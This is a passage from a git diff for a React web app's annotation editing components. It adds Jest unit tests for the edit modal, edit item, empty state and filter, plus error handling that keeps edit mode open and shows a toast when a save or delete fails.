screen } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import EditItem, { EditItemType, EditTitle } from './index' + +describe('EditTitle', () => { + it('should render title content correctly', () => { + // Arrange + const props = { title: 'Test Title' } + + // Act + render() + + // Assert + expect(screen.getByText(/test title/i)).toBeInTheDocument() + // Should contain edit icon (svg element) + expect(document.querySelector('svg')).toBeInTheDocument() + }) + + it('should apply custom className when provided', () => { + // Arrange + const props = { + title: 'Test Title', + className: 'custom-class', + } + + // Act + const { container } = render() + + // Assert + expect(screen.getByText(/test title/i)).toBeInTheDocument() + expect(container.querySelector('.custom-class')).toBeInTheDocument() + }) +}) + +describe('EditItem', () => { + const defaultProps = { + type: EditItemType.Query, + content: 'Test content', + onSave: jest.fn(), + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering tests (REQUIRED) + describe('Rendering', () => { 
+ it('should render content correctly', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + expect(screen.getByText(/test content/i)).toBeInTheDocument() + // Should show item name (query or answer) + expect(screen.getByText('appAnnotation.editModal.queryName')).toBeInTheDocument() + }) + + it('should render different item types correctly', () => { + // Arrange + const props = { + ...defaultProps, + type: EditItemType.Answer, + content: 'Answer content', + } + + // Act + render() + + // Assert + expect(screen.getByText(/answer content/i)).toBeInTheDocument() + expect(screen.getByText('appAnnotation.editModal.answerName')).toBeInTheDocument() + }) + + it('should show edit controls when not readonly', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + expect(screen.getByText('common.operation.edit')).toBeInTheDocument() + }) + + it('should hide edit controls when readonly', () => { + // Arrange + const props = { + ...defaultProps, + readonly: true, + } + + // Act + render() + + // Assert + expect(screen.queryByText('common.operation.edit')).not.toBeInTheDocument() + }) + }) + + // Props tests (REQUIRED) + describe('Props', () => { + it('should respect readonly prop for edit functionality', () => { + // Arrange + const props = { + ...defaultProps, + readonly: true, + } + + // Act + render() + + // Assert + expect(screen.getByText(/test content/i)).toBeInTheDocument() + expect(screen.queryByText('common.operation.edit')).not.toBeInTheDocument() + }) + + it('should display provided content', () => { + // Arrange + const props = { + ...defaultProps, + content: 'Custom content for testing', + } + + // Act + render() + + // Assert + expect(screen.getByText(/custom content for testing/i)).toBeInTheDocument() + }) + + it('should render appropriate content based on type', () => { + // Arrange + const props = { + ...defaultProps, + type: EditItemType.Query, + content: 'Question content', + } + + // Act + render() + + // Assert + expect(screen.getByText(/question content/i)).toBeInTheDocument() + expect(screen.getByText('appAnnotation.editModal.queryName')).toBeInTheDocument() + }) + }) + + // User Interactions + describe('User Interactions', () => { + it('should activate edit mode when edit button is clicked', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + // Assert + expect(screen.getByRole('textbox')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.save' })).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.cancel' })).toBeInTheDocument() + }) + + it('should save new content when save button is clicked', async () => { + // Arrange + const mockSave = jest.fn().mockResolvedValue(undefined) + const props = { + ...defaultProps, + onSave: mockSave, + } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + // Type new content + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Updated content') + + // Save + await user.click(screen.getByRole('button', { name: 'common.operation.save' })) + + // Assert + expect(mockSave).toHaveBeenCalledWith('Updated content') + }) + + it('should exit edit mode when cancel button is clicked', async () => { + // Arrange + const props = { ...defaultProps } + const user = 
userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + await user.click(screen.getByRole('button', { name: 'common.operation.cancel' })) + + // Assert + expect(screen.queryByRole('textbox')).not.toBeInTheDocument() + expect(screen.getByText(/test content/i)).toBeInTheDocument() + }) + + it('should show content preview while typing', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + const textarea = screen.getByRole('textbox') + await user.type(textarea, 'New content') + + // Assert + expect(screen.getByText(/new content/i)).toBeInTheDocument() + }) + + it('should call onSave with correct content when saving', async () => { + // Arrange + const mockSave = jest.fn().mockResolvedValue(undefined) + const props = { + ...defaultProps, + onSave: mockSave, + } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Test save content') + + // Save + await user.click(screen.getByRole('button', { name: 'common.operation.save' })) + + // Assert + expect(mockSave).toHaveBeenCalledWith('Test save content') + }) + + it('should show delete option and restore original content when delete is clicked', async () => { + // Arrange + const mockSave = jest.fn().mockResolvedValue(undefined) + const props = { + ...defaultProps, + onSave: mockSave, + } + const user = userEvent.setup() + + // Act + render() + + // Enter edit mode and change content + await user.click(screen.getByText('common.operation.edit')) + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Modified content') + + // Save to trigger content change + await user.click(screen.getByRole('button', { name: 'common.operation.save' })) + + // Assert + expect(mockSave).toHaveBeenNthCalledWith(1, 'Modified content') + expect(await screen.findByText('common.operation.delete')).toBeInTheDocument() + + await user.click(screen.getByText('common.operation.delete')) + + expect(mockSave).toHaveBeenNthCalledWith(2, 'Test content') + expect(screen.queryByText('common.operation.delete')).not.toBeInTheDocument() + }) + + it('should handle keyboard interactions in edit mode', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + const textarea = screen.getByRole('textbox') + + // Test typing + await user.type(textarea, 'Keyboard test') + + // Assert + expect(textarea).toHaveValue('Keyboard test') + expect(screen.getByText(/keyboard test/i)).toBeInTheDocument() + }) + }) + + // State Management + describe('State Management', () => { + it('should reset newContent when content prop changes', async () => { + // Arrange + const { rerender } = render() + + // Act - Enter edit mode and type something + const user = userEvent.setup() + await user.click(screen.getByText('common.operation.edit')) + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'New content') + + // Rerender with new content prop + rerender() + + // Assert - Textarea value should be reset due to useEffect + expect(textarea).toHaveValue('') + }) + + it('should preserve edit state across content changes', async () => { + // Arrange + 
const { rerender } = render() + const user = userEvent.setup() + + // Act - Enter edit mode + await user.click(screen.getByText('common.operation.edit')) + + // Rerender with new content + rerender() + + // Assert - Should still be in edit mode + expect(screen.getByRole('textbox')).toBeInTheDocument() + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle empty content', () => { + // Arrange + const props = { + ...defaultProps, + content: '', + } + + // Act + const { container } = render() + + // Assert - Should render without crashing + // Check that the component renders properly with empty content + expect(container.querySelector('.grow')).toBeInTheDocument() + // Should still show edit button + expect(screen.getByText('common.operation.edit')).toBeInTheDocument() + }) + + it('should handle very long content', () => { + // Arrange + const longContent = 'A'.repeat(1000) + const props = { + ...defaultProps, + content: longContent, + } + + // Act + render() + + // Assert + expect(screen.getByText(longContent)).toBeInTheDocument() + }) + + it('should handle content with special characters', () => { + // Arrange + const specialContent = 'Content with & < > " \' characters' + const props = { + ...defaultProps, + content: specialContent, + } + + // Act + render() + + // Assert + expect(screen.getByText(specialContent)).toBeInTheDocument() + }) + + it('should handle rapid edit/cancel operations', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + + // Rapid edit/cancel operations + await user.click(screen.getByText('common.operation.edit')) + await user.click(screen.getByText('common.operation.cancel')) + await user.click(screen.getByText('common.operation.edit')) + await user.click(screen.getByText('common.operation.cancel')) + + // Assert + expect(screen.queryByRole('textbox')).not.toBeInTheDocument() + expect(screen.getByText('Test content')).toBeInTheDocument() + }) + + it('should handle save failure gracefully in edit mode', async () => { + // Arrange + const mockSave = jest.fn().mockRejectedValueOnce(new Error('Save failed')) + const props = { + ...defaultProps, + onSave: mockSave, + } + const user = userEvent.setup() + + // Act + render() + + // Enter edit mode and save (should fail) + await user.click(screen.getByText('common.operation.edit')) + const textarea = screen.getByRole('textbox') + await user.type(textarea, 'New content') + + // Save should fail but not throw + await user.click(screen.getByRole('button', { name: 'common.operation.save' })) + + // Assert - Should remain in edit mode when save fails + expect(screen.getByRole('textbox')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.save' })).toBeInTheDocument() + expect(mockSave).toHaveBeenCalledWith('New content') + }) + + it('should handle delete action failure gracefully', async () => { + // Arrange + const mockSave = jest.fn() + .mockResolvedValueOnce(undefined) // First save succeeds + .mockRejectedValueOnce(new Error('Delete failed')) // Delete fails + const props = { + ...defaultProps, + onSave: mockSave, + } + const user = userEvent.setup() + + // Act + render() + + // Edit content to show delete button + await user.click(screen.getByText('common.operation.edit')) + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Modified content') + + // Save to create new content + await user.click(screen.getByRole('button', { name: 
'common.operation.save' })) + await screen.findByText('common.operation.delete') + + // Click delete (should fail but not throw) + await user.click(screen.getByText('common.operation.delete')) + + // Assert - Delete action should handle error gracefully + expect(mockSave).toHaveBeenCalledTimes(2) + expect(mockSave).toHaveBeenNthCalledWith(1, 'Modified content') + expect(mockSave).toHaveBeenNthCalledWith(2, 'Test content') + + // When delete fails, the delete button should still be visible (state not changed) + expect(screen.getByText('common.operation.delete')).toBeInTheDocument() + expect(screen.getByText('Modified content')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.tsx b/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.tsx index e808d0b48a..6ba830967d 100644 --- a/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.tsx +++ b/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.tsx @@ -6,7 +6,7 @@ import { RiDeleteBinLine, RiEditFill, RiEditLine } from '@remixicon/react' import { Robot, User } from '@/app/components/base/icons/src/public/avatar' import Textarea from '@/app/components/base/textarea' import Button from '@/app/components/base/button' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' export enum EditItemType { Query = 'query', @@ -52,8 +52,14 @@ const EditItem: FC = ({ }, [content]) const handleSave = async () => { - await onSave(newContent) - setIsEdit(false) + try { + await onSave(newContent) + setIsEdit(false) + } + catch { + // Keep edit mode open when save fails + // Error notification is handled by the parent component + } } const handleCancel = () => { @@ -96,9 +102,16 @@ const EditItem: FC = ({
·
{ - setNewContent(content) - onSave(content) + onClick={async () => { + try { + await onSave(content) + // Only update UI state after successful delete + setNewContent(content) + } + catch { + // Delete action failed - error is already handled by parent + // UI state remains unchanged, user can retry + } }} >
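The two diffs above establish a save contract between the modal and the edit item: the parent surfaces the toast and re-throws, and the child only leaves edit mode when the promise resolves. Restated as a condensed sketch, where `persist`, `t`, and `exitEditMode` are illustrative stand-ins for the real service call, translator, and state setter:

```typescript
import Toast from '@/app/components/base/toast'

// Parent side (EditAnnotationModal): notify, then re-throw so the child
// can keep its edit state. `persist` stands in for add/editAnnotation.
const makeOnSave = (persist: (content: string) => Promise<void>, t: (key: string) => string) =>
  async (content: string) => {
    try {
      await persist(content)
      Toast.notify({ type: 'success', message: t('common.api.actionSuccess') })
    }
    catch (error) {
      const fallback = t('common.api.actionFailed')
      Toast.notify({
        type: 'error',
        message: error instanceof Error && error.message ? error.message : fallback,
      })
      throw error
    }
  }

// Child side (EditItem): only exit edit mode when onSave resolved.
const handleSave = async (onSave: (c: string) => Promise<void>, content: string, exitEditMode: () => void) => {
  try {
    await onSave(content)
    exitEditMode()
  }
  catch {
    // keep the textarea open so the user can retry
  }
}
```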
diff --git a/web/app/components/app/annotation/edit-annotation-modal/index.spec.tsx b/web/app/components/app/annotation/edit-annotation-modal/index.spec.tsx new file mode 100644 index 0000000000..bdc991116c --- /dev/null +++ b/web/app/components/app/annotation/edit-annotation-modal/index.spec.tsx @@ -0,0 +1,680 @@ +import { render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import Toast, { type IToastProps, type ToastHandle } from '@/app/components/base/toast' +import EditAnnotationModal from './index' + +// Mock only external dependencies +jest.mock('@/service/annotation', () => ({ + addAnnotation: jest.fn(), + editAnnotation: jest.fn(), +})) + +jest.mock('@/context/provider-context', () => ({ + useProviderContext: () => ({ + plan: { + usage: { annotatedResponse: 5 }, + total: { annotatedResponse: 10 }, + }, + enableBilling: true, + }), +})) + +jest.mock('@/hooks/use-timestamp', () => ({ + __esModule: true, + default: () => ({ + formatTime: () => '2023-12-01 10:30:00', + }), +})) + +// Note: i18n is automatically mocked by Jest via __mocks__/react-i18next.ts + +jest.mock('@/app/components/billing/annotation-full', () => ({ + __esModule: true, + default: () =>
, +})) + +type ToastNotifyProps = Pick +type ToastWithNotify = typeof Toast & { notify: (props: ToastNotifyProps) => ToastHandle } +const toastWithNotify = Toast as unknown as ToastWithNotify +const toastNotifySpy = jest.spyOn(toastWithNotify, 'notify').mockReturnValue({ clear: jest.fn() }) + +const { addAnnotation: mockAddAnnotation, editAnnotation: mockEditAnnotation } = jest.requireMock('@/service/annotation') as { + addAnnotation: jest.Mock + editAnnotation: jest.Mock +} + +describe('EditAnnotationModal', () => { + const defaultProps = { + isShow: true, + onHide: jest.fn(), + appId: 'test-app-id', + query: 'Test query', + answer: 'Test answer', + onEdited: jest.fn(), + onAdded: jest.fn(), + onRemove: jest.fn(), + } + + afterAll(() => { + toastNotifySpy.mockRestore() + }) + + beforeEach(() => { + jest.clearAllMocks() + mockAddAnnotation.mockResolvedValue({ + id: 'test-id', + account: { name: 'Test User' }, + }) + mockEditAnnotation.mockResolvedValue({}) + }) + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should render modal when isShow is true', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Check for modal title as it appears in the mock + expect(screen.getByText('appAnnotation.editModal.title')).toBeInTheDocument() + }) + + it('should not render modal when isShow is false', () => { + // Arrange + const props = { ...defaultProps, isShow: false } + + // Act + render() + + // Assert + expect(screen.queryByText('appAnnotation.editModal.title')).not.toBeInTheDocument() + }) + + it('should display query and answer sections', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Look for query and answer content + expect(screen.getByText('Test query')).toBeInTheDocument() + expect(screen.getByText('Test answer')).toBeInTheDocument() + }) + }) + + // Props tests (REQUIRED) + describe('Props', () => { + it('should handle different query and answer content', () => { + // Arrange + const props = { + ...defaultProps, + query: 'Custom query content', + answer: 'Custom answer content', + } + + // Act + render() + + // Assert - Check content is displayed + expect(screen.getByText('Custom query content')).toBeInTheDocument() + expect(screen.getByText('Custom answer content')).toBeInTheDocument() + }) + + it('should show remove option when annotationId is provided', () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + } + + // Act + render() + + // Assert - Remove option should be present (using pattern) + expect(screen.getByText('appAnnotation.editModal.removeThisCache')).toBeInTheDocument() + }) + }) + + // User Interactions + describe('User Interactions', () => { + it('should enable editing for query and answer sections', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Edit links should be visible (using text content) + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + expect(editLinks).toHaveLength(2) + }) + + it('should show remove option when annotationId is provided', () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + } + + // Act + render() + + // Assert + expect(screen.getByText('appAnnotation.editModal.removeThisCache')).toBeInTheDocument() + }) + + it('should save content when edited', async () => { + // Arrange + const mockOnAdded = jest.fn() + const props = { + ...defaultProps, + onAdded: mockOnAdded, + } + const user = 
userEvent.setup() + + // Mock API response + mockAddAnnotation.mockResolvedValueOnce({ + id: 'test-annotation-id', + account: { name: 'Test User' }, + }) + + // Act + render() + + // Find and click edit link for query + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + // Find textarea and enter new content + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'New query content') + + // Click save button + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + expect(mockAddAnnotation).toHaveBeenCalledWith('test-app-id', { + question: 'New query content', + answer: 'Test answer', + message_id: undefined, + }) + }) + }) + + // API Calls + describe('API Calls', () => { + it('should call addAnnotation when saving new annotation', async () => { + // Arrange + const mockOnAdded = jest.fn() + const props = { + ...defaultProps, + onAdded: mockOnAdded, + } + const user = userEvent.setup() + + // Mock the API response + mockAddAnnotation.mockResolvedValueOnce({ + id: 'test-annotation-id', + account: { name: 'Test User' }, + }) + + // Act + render() + + // Edit query content + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Updated query') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + expect(mockAddAnnotation).toHaveBeenCalledWith('test-app-id', { + question: 'Updated query', + answer: 'Test answer', + message_id: undefined, + }) + }) + + it('should call editAnnotation when updating existing annotation', async () => { + // Arrange + const mockOnEdited = jest.fn() + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + messageId: 'test-message-id', + onEdited: mockOnEdited, + } + const user = userEvent.setup() + + // Act + render() + + // Edit query content + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Modified query') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + expect(mockEditAnnotation).toHaveBeenCalledWith( + 'test-app-id', + 'test-annotation-id', + { + message_id: 'test-message-id', + question: 'Modified query', + answer: 'Test answer', + }, + ) + }) + }) + + // State Management + describe('State Management', () => { + it('should initialize with closed confirm modal', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Confirm dialog should not be visible initially + expect(screen.queryByText('appDebug.feature.annotation.removeConfirm')).not.toBeInTheDocument() + }) + + it('should show confirm modal when remove is clicked', async () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('appAnnotation.editModal.removeThisCache')) + + // Assert - Confirmation dialog should appear + expect(screen.getByText('appDebug.feature.annotation.removeConfirm')).toBeInTheDocument() + }) + + it('should call onRemove when removal is confirmed', async () => { + 
// Arrange + const mockOnRemove = jest.fn() + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + onRemove: mockOnRemove, + } + const user = userEvent.setup() + + // Act + render() + + // Click remove + await user.click(screen.getByText('appAnnotation.editModal.removeThisCache')) + + // Click confirm + const confirmButton = screen.getByRole('button', { name: 'common.operation.confirm' }) + await user.click(confirmButton) + + // Assert + expect(mockOnRemove).toHaveBeenCalled() + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle empty query and answer', () => { + // Arrange + const props = { + ...defaultProps, + query: '', + answer: '', + } + + // Act + render() + + // Assert + expect(screen.getByText('appAnnotation.editModal.title')).toBeInTheDocument() + }) + + it('should handle very long content', () => { + // Arrange + const longQuery = 'Q'.repeat(1000) + const longAnswer = 'A'.repeat(1000) + const props = { + ...defaultProps, + query: longQuery, + answer: longAnswer, + } + + // Act + render() + + // Assert + expect(screen.getByText(longQuery)).toBeInTheDocument() + expect(screen.getByText(longAnswer)).toBeInTheDocument() + }) + + it('should handle special characters in content', () => { + // Arrange + const specialQuery = 'Query with & < > " \' characters' + const specialAnswer = 'Answer with & < > " \' characters' + const props = { + ...defaultProps, + query: specialQuery, + answer: specialAnswer, + } + + // Act + render() + + // Assert + expect(screen.getByText(specialQuery)).toBeInTheDocument() + expect(screen.getByText(specialAnswer)).toBeInTheDocument() + }) + + it('should handle onlyEditResponse prop', () => { + // Arrange + const props = { + ...defaultProps, + onlyEditResponse: true, + } + + // Act + render() + + // Assert - Query should be readonly, answer should be editable + const editLinks = screen.queryAllByText(/common\.operation\.edit/i) + expect(editLinks).toHaveLength(1) // Only answer should have edit button + }) + }) + + // Error Handling (CRITICAL for coverage) + describe('Error Handling', () => { + it('should show error toast and skip callbacks when addAnnotation fails', async () => { + // Arrange + const mockOnAdded = jest.fn() + const props = { + ...defaultProps, + onAdded: mockOnAdded, + } + const user = userEvent.setup() + + // Mock API failure + mockAddAnnotation.mockRejectedValueOnce(new Error('API Error')) + + // Act + render() + + // Find and click edit link for query + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + // Find textarea and enter new content + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'New query content') + + // Click save button + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + await waitFor(() => { + expect(toastNotifySpy).toHaveBeenCalledWith({ + message: 'API Error', + type: 'error', + }) + }) + expect(mockOnAdded).not.toHaveBeenCalled() + + // Verify edit mode remains open (textarea should still be visible) + expect(screen.getByRole('textbox')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.save' })).toBeInTheDocument() + }) + + it('should show fallback error message when addAnnotation error has no message', async () => { + // Arrange + const mockOnAdded = jest.fn() + const props = { + ...defaultProps, + onAdded: mockOnAdded, + } + const user = 
userEvent.setup() + + mockAddAnnotation.mockRejectedValueOnce({}) + + // Act + render() + + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'New query content') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + await waitFor(() => { + expect(toastNotifySpy).toHaveBeenCalledWith({ + message: 'common.api.actionFailed', + type: 'error', + }) + }) + expect(mockOnAdded).not.toHaveBeenCalled() + + // Verify edit mode remains open (textarea should still be visible) + expect(screen.getByRole('textbox')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.save' })).toBeInTheDocument() + }) + + it('should show error toast and skip callbacks when editAnnotation fails', async () => { + // Arrange + const mockOnEdited = jest.fn() + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + messageId: 'test-message-id', + onEdited: mockOnEdited, + } + const user = userEvent.setup() + + // Mock API failure + mockEditAnnotation.mockRejectedValueOnce(new Error('API Error')) + + // Act + render() + + // Edit query content + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Modified query') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + await waitFor(() => { + expect(toastNotifySpy).toHaveBeenCalledWith({ + message: 'API Error', + type: 'error', + }) + }) + expect(mockOnEdited).not.toHaveBeenCalled() + + // Verify edit mode remains open (textarea should still be visible) + expect(screen.getByRole('textbox')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.save' })).toBeInTheDocument() + }) + + it('should show fallback error message when editAnnotation error is not an Error instance', async () => { + // Arrange + const mockOnEdited = jest.fn() + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + messageId: 'test-message-id', + onEdited: mockOnEdited, + } + const user = userEvent.setup() + + mockEditAnnotation.mockRejectedValueOnce('oops') + + // Act + render() + + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Modified query') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + await waitFor(() => { + expect(toastNotifySpy).toHaveBeenCalledWith({ + message: 'common.api.actionFailed', + type: 'error', + }) + }) + expect(mockOnEdited).not.toHaveBeenCalled() + + // Verify edit mode remains open (textarea should still be visible) + expect(screen.getByRole('textbox')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.save' })).toBeInTheDocument() + }) + }) + + // Billing & Plan Features + describe('Billing & Plan Features', () => { + it('should show createdAt time when provided', () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + createdAt: 1701381000, // 2023-12-01 10:30:00 + } + + // Act + render() + + // Assert - Check that 
the formatted time appears somewhere in the component + const container = screen.getByRole('dialog') + expect(container).toHaveTextContent('2023-12-01 10:30:00') + }) + + it('should not show createdAt when not provided', () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + // createdAt is undefined + } + + // Act + render() + + // Assert - Should not contain any timestamp + const container = screen.getByRole('dialog') + expect(container).not.toHaveTextContent('2023-12-01 10:30:00') + }) + + it('should display remove section when annotationId exists', () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + } + + // Act + render() + + // Assert - Should have remove functionality + expect(screen.getByText('appAnnotation.editModal.removeThisCache')).toBeInTheDocument() + }) + }) + + // Toast Notifications (Success) + describe('Toast Notifications', () => { + it('should show success notification when save operation completes', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Updated query') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + await waitFor(() => { + expect(toastNotifySpy).toHaveBeenCalledWith({ + message: 'common.api.actionSuccess', + type: 'success', + }) + }) + }) + }) + + // React.memo Performance Testing + describe('React.memo Performance', () => { + it('should not re-render when props are the same', () => { + // Arrange + const props = { ...defaultProps } + const { rerender } = render() + + // Act - Re-render with same props + rerender() + + // Assert - Component should still be visible (no errors thrown) + expect(screen.getByText('appAnnotation.editModal.title')).toBeInTheDocument() + }) + + it('should re-render when props change', () => { + // Arrange + const props = { ...defaultProps } + const { rerender } = render() + + // Act - Re-render with different props + const newProps = { ...props, query: 'New query content' } + rerender() + + // Assert - Should show new content + expect(screen.getByText('New query content')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/annotation/edit-annotation-modal/index.tsx b/web/app/components/app/annotation/edit-annotation-modal/index.tsx index 2961ce393c..6172a215e4 100644 --- a/web/app/components/app/annotation/edit-annotation-modal/index.tsx +++ b/web/app/components/app/annotation/edit-annotation-modal/index.tsx @@ -53,27 +53,39 @@ const EditAnnotationModal: FC = ({ postQuery = editedContent else postAnswer = editedContent - if (!isAdd) { - await editAnnotation(appId, annotationId, { - message_id: messageId, - question: postQuery, - answer: postAnswer, - }) - onEdited(postQuery, postAnswer) - } - else { - const res: any = await addAnnotation(appId, { - question: postQuery, - answer: postAnswer, - message_id: messageId, - }) - onAdded(res.id, res.account?.name, postQuery, postAnswer) - } + try { + if (!isAdd) { + await editAnnotation(appId, annotationId, { + message_id: messageId, + question: postQuery, + answer: postAnswer, + }) + onEdited(postQuery, postAnswer) + } + else { + const res = await addAnnotation(appId, { + question: postQuery, + answer: postAnswer, + 
message_id: messageId, + }) + onAdded(res.id, res.account?.name ?? '', postQuery, postAnswer) + } - Toast.notify({ - message: t('common.api.actionSuccess') as string, - type: 'success', - }) + Toast.notify({ + message: t('common.api.actionSuccess') as string, + type: 'success', + }) + } + catch (error) { + const fallbackMessage = t('common.api.actionFailed') as string + const message = error instanceof Error && error.message ? error.message : fallbackMessage + Toast.notify({ + message, + type: 'error', + }) + // Re-throw to preserve edit mode behavior for UI components + throw error + } } const [showModal, setShowModal] = useState(false) diff --git a/web/app/components/app/annotation/empty-element.spec.tsx b/web/app/components/app/annotation/empty-element.spec.tsx new file mode 100644 index 0000000000..56ebb96121 --- /dev/null +++ b/web/app/components/app/annotation/empty-element.spec.tsx @@ -0,0 +1,13 @@ +import React from 'react' +import { render, screen } from '@testing-library/react' +import EmptyElement from './empty-element' + +describe('EmptyElement', () => { + it('should render the empty state copy and supporting icon', () => { + const { container } = render() + + expect(screen.getByText('appAnnotation.noData.title')).toBeInTheDocument() + expect(screen.getByText('appAnnotation.noData.description')).toBeInTheDocument() + expect(container.querySelector('svg')).not.toBeNull() + }) +}) diff --git a/web/app/components/app/annotation/filter.spec.tsx b/web/app/components/app/annotation/filter.spec.tsx new file mode 100644 index 0000000000..6260ff7668 --- /dev/null +++ b/web/app/components/app/annotation/filter.spec.tsx @@ -0,0 +1,70 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import Filter, { type QueryParam } from './filter' +import useSWR from 'swr' + +jest.mock('swr', () => ({ + __esModule: true, + default: jest.fn(), +})) + +jest.mock('@/service/log', () => ({ + fetchAnnotationsCount: jest.fn(), +})) + +const mockUseSWR = useSWR as unknown as jest.Mock + +describe('Filter', () => { + const appId = 'app-1' + const childContent = 'child-content' + + beforeEach(() => { + jest.clearAllMocks() + }) + + it('should render nothing until annotation count is fetched', () => { + mockUseSWR.mockReturnValue({ data: undefined }) + + const { container } = render( + +
<Filter appId={appId} queryParams={{}} setQueryParams={jest.fn()}> + <div>{childContent}</div>
+ </Filter>
, + ) + + expect(container.firstChild).toBeNull() + expect(mockUseSWR).toHaveBeenCalledWith( + { url: `/apps/${appId}/annotations/count` }, + expect.any(Function), + ) + }) + + it('should propagate keyword changes and clearing behavior', () => { + mockUseSWR.mockReturnValue({ data: { total: 20 } }) + const queryParams: QueryParam = { keyword: 'prefill' } + const setQueryParams = jest.fn() + + const { container } = render( + +
<Filter appId={appId} queryParams={queryParams} setQueryParams={setQueryParams}> + <div>{childContent}</div>
+ </Filter>
